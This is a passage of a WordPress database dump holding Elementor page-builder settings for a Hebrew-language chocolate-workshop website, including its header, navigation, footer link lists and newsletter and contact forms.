\\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(794,165,'_elementor_version','0.4'),(795,165,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(796,166,'_elementor_template_type','single'),(797,166,'_elementor_edit_mode','builder'),(798,166,'_wp_page_template','default'),(799,166,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(800,166,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"f3418e3\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8142c60\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(801,166,'_elementor_version','0.4'),(802,166,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(805,167,'_edit_last','1'),(806,167,'_edit_lock','1596632228:1'),(807,167,'_wp_page_template','elementor_header_footer'),(809,167,'_elementor_edit_mode','builder'),(811,167,'_elementor_data','[{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"972ca81\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d4\\u05de\\u05d2\\u05d6\\u05d9\\u05df \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05e9\\u05dc 